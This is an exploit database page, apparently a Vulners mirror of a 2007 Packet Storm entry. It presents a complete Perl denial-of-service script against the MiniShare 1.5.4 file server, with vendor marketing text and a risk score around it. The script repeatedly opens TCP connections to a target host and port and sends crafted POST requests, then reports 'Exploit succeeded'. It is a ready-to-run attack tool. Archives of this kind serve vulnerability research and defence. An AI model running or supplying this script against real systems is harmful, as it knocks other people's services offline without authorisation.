Lucene search
K

minish.txt

🗓️ 17 Apr 2007 00:00:00Reported by deviceType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

MiniShare 1.5.4 Denial Of Service attack in Perl script

Code
`#!/usr/bin/perl  
  
###########################################  
# MiniShare 1.5.4 Denial Of Service  
#  
# Site: http://minishare.sourceforge.net/  
#  
#  
# Coded by device - geeksytem[at]gmail[dot]com  
# http://geekmind.altervista.org  
###########################################  
  
use strict;  
use warnings;  
use IO::Socket;  
  
sub usage{  
print "Usage: script.pl host port\n\n";  
}  
  
print "------------------------------\n";  
print "MiniShare 1.5.4 DoS\n";  
print "------------------------------\n";  
print "Coded by device\n";  
print "geeksystem[at]gmail[dot]com\n";  
print "http://geekmind.altervista.org\n\n";  
  
if (@ARGV < 2) { &usage; exit;}  
  
my $host = $ARGV[0];  
my $port = $ARGV[1];  
my $time = '950';  
my $req = 'A'x40;  
  
for (my $i=1; $i<=$time; $i++)  
{  
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"$port")  
or die "[+] Connecting ... Could not connect to host.\n\n";  
  
print $sock "POST /".$req." HTTP/1.1 \n\n";  
}  
  
print "Exploit succeeded\n\n";  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Apr 2007 00:00Current
7.4High risk
Vulners AI Score7.4
16